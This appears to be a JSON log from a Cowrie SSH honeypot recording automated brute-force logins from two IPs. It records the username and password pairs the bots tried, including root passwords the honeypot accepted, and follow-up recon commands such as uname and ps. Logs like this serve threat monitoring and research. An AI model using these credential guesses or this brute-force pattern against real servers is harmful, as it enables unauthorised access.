{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:26:26.322768Z","src_ip":"217.154.1.158","session":"a243c3c3218b"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:26:26.366390Z","src_ip":"217.154.1.158","session":"a243c3c3218b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:26:27.383015Z","src_ip":"217.154.1.158","session":"a243c3c3218b"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":47202,"dst_ip":"1.2.3.4","dst_port":22,"session":"79db1fbad3d5","protocol":"ssh","message":"New connection: 213.108.243.7:47202 (1.2.3.4:22) [session: 79db1fbad3d5]","sensor":"my-vps","timestamp":"2025-08-26T19:26:34.297663Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:26:34.300750Z","src_ip":"213.108.243.7","session":"79db1fbad3d5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:26:34.407829Z","src_ip":"213.108.243.7","session":"79db1fbad3d5"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword147","message":"login attempt [root/P@ssword147] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:26:35.673501Z","src_ip":"213.108.243.7","session":"79db1fbad3d5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:26:36.139339Z","src_ip":"213.108.243.7","session":"79db1fbad3d5"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-26T19:26:36.140058Z","src_ip":"213.108.243.7","session":"79db1fbad3d5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:26:36.276504Z","src_ip":"213.108.243.7","session":"79db1fbad3d5"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:26:36.303095Z","src_ip":"213.108.243.7","session":"79db1fbad3d5"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":49178,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb3dc7e8208d","protocol":"ssh","message":"New connection: 217.154.1.158:49178 (1.2.3.4:22) [session: eb3dc7e8208d]","sensor":"my-vps","timestamp":"2025-08-26T19:26:43.800156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:26:43.801119Z","src_ip":"217.154.1.158","session":"eb3dc7e8208d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:26:43.815204Z","src_ip":"217.154.1.158","session":"eb3dc7e8208d"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssword","message":"login attempt [root/p@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:26:43.860605Z","src_ip":"217.154.1.158","session":"eb3dc7e8208d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:26:43.961652Z","src_ip":"217.154.1.158","session":"eb3dc7e8208d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:26:43.962421Z","src_ip":"217.154.1.158","session":"eb3dc7e8208d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:26:43.977878Z","src_ip":"217.154.1.158","session":"eb3dc7e8208d"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:26:43.979036Z","src_ip":"217.154.1.158","session":"eb3dc7e8208d"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":40610,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3b12f160594","protocol":"ssh","message":"New connection: 217.154.1.158:40610 (1.2.3.4:22) [session: d3b12f160594]","sensor":"my-vps","timestamp":"2025-08-26T19:27:01.311720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:27:01.312543Z","src_ip":"217.154.1.158","session":"d3b12f160594"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:27:01.327675Z","src_ip":"217.154.1.158","session":"d3b12f160594"}
{"eventid":"cowrie.login.failed","username":"tom","password":"123456","message":"login attempt [tom/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:27:01.371679Z","src_ip":"217.154.1.158","session":"d3b12f160594"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:27:02.388264Z","src_ip":"217.154.1.158","session":"d3b12f160594"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":51246,"dst_ip":"1.2.3.4","dst_port":22,"session":"1805c9a61485","protocol":"ssh","message":"New connection: 217.154.1.158:51246 (1.2.3.4:22) [session: 1805c9a61485]","sensor":"my-vps","timestamp":"2025-08-26T19:27:18.803783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:27:18.805394Z","src_ip":"217.154.1.158","session":"1805c9a61485"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:27:18.818689Z","src_ip":"217.154.1.158","session":"1805c9a61485"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456","message":"login attempt [root/Ab123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:27:18.874440Z","src_ip":"217.154.1.158","session":"1805c9a61485"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:27:18.971662Z","src_ip":"217.154.1.158","session":"1805c9a61485"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:27:18.972329Z","src_ip":"217.154.1.158","session":"1805c9a61485"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:27:18.987689Z","src_ip":"217.154.1.158","session":"1805c9a61485"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:27:18.988973Z","src_ip":"217.154.1.158","session":"1805c9a61485"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":53860,"dst_ip":"1.2.3.4","dst_port":22,"session":"927400463730","protocol":"ssh","message":"New connection: 217.154.1.158:53860 (1.2.3.4:22) [session: 927400463730]","sensor":"my-vps","timestamp":"2025-08-26T19:27:36.283184Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:27:36.284055Z","src_ip":"217.154.1.158","session":"927400463730"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:27:36.298327Z","src_ip":"217.154.1.158","session":"927400463730"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar123","message":"login attempt [oscar/oscar123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:27:36.352361Z","src_ip":"217.154.1.158","session":"927400463730"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:27:37.380335Z","src_ip":"217.154.1.158","session":"927400463730"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":57950,"dst_ip":"1.2.3.4","dst_port":22,"session":"90e4541107a3","protocol":"ssh","message":"New connection: 217.154.1.158:57950 (1.2.3.4:22) [session: 90e4541107a3]","sensor":"my-vps","timestamp":"2025-08-26T19:27:53.646283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:27:53.647309Z","src_ip":"217.154.1.158","session":"90e4541107a3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:27:53.660258Z","src_ip":"217.154.1.158","session":"90e4541107a3"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@wsx","message":"login attempt [root/1qaz@wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:27:53.716418Z","src_ip":"217.154.1.158","session":"90e4541107a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:27:53.768479Z","src_ip":"217.154.1.158","session":"90e4541107a3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:27:53.769225Z","src_ip":"217.154.1.158","session":"90e4541107a3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:27:53.784367Z","src_ip":"217.154.1.158","session":"90e4541107a3"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:27:53.785385Z","src_ip":"217.154.1.158","session":"90e4541107a3"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":33486,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6b495b5ec2c","protocol":"ssh","message":"New connection: 217.154.1.158:33486 (1.2.3.4:22) [session: c6b495b5ec2c]","sensor":"my-vps","timestamp":"2025-08-26T19:28:11.112239Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:28:11.113216Z","src_ip":"217.154.1.158","session":"c6b495b5ec2c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:28:11.127800Z","src_ip":"217.154.1.158","session":"c6b495b5ec2c"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword","message":"login attempt [root/P@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:28:11.187114Z","src_ip":"217.154.1.158","session":"c6b495b5ec2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:28:11.287573Z","src_ip":"217.154.1.158","session":"c6b495b5ec2c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:28:11.288359Z","src_ip":"217.154.1.158","session":"c6b495b5ec2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:28:11.304065Z","src_ip":"217.154.1.158","session":"c6b495b5ec2c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:28:11.305040Z","src_ip":"217.154.1.158","session":"c6b495b5ec2c"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":53340,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d2dddbc8fcf","protocol":"ssh","message":"New connection: 217.154.1.158:53340 (1.2.3.4:22) [session: 6d2dddbc8fcf]","sensor":"my-vps","timestamp":"2025-08-26T19:28:28.716947Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:28:28.717970Z","src_ip":"217.154.1.158","session":"6d2dddbc8fcf"}
